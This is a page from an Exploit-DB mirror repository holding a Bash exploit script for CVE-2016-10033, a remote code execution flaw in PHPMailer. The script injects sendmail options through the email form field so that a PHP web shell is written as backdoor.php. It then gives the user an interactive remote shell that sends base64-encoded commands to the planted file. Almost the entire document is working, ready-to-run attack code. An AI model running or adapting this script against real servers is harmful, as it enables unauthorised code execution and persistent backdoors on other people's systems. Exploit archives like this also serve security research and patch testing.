bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40968.php
Offensive Security f8746c89a4 DB: 2016-12-29 
4 new exploits

analogx SimpleServer:WWW 1.0.6 - Directory Traversal
AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal

My PHP Dating - 'success_story.php id' SQL Injection
My PHP Dating - 'id' Parameter SQL Injection

Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection
Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection

Roundcube 1.1.3 - Directory Traversal
Roundcube Webmail 1.1.3 - Directory Traversal

PHPMailer 5.2.17 - Remote Code Execution
PHPMailer < 5.2.18 - Remote Code Execution (Bash)
PHPMailer < 5.2.18 - Remote Code Execution (PHP)
PHPMailer < 5.2.20 - Remote Code Execution
WordPress Plugin Simply Poll 1.4.1 - SQL Injection
SwiftMailer < 5.4.5-DEV - Remote Code Execution
2016-12-29 05:01:16 +00:00

27 lines
No EOL
1.3 KiB
Bash
Executable file
Raw Blame History

#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033
echo '[+] CVE-2016-10033 exploit by opsxcq'
if [ -z "$1" ]
then
echo '[-] Please inform an host as parameter'
exit -1
fi
host=$1
echo '[+] Exploiting '$host
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
echo '[+] Running '$cmd
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'
Reference in a new issue View git blame Copy permalink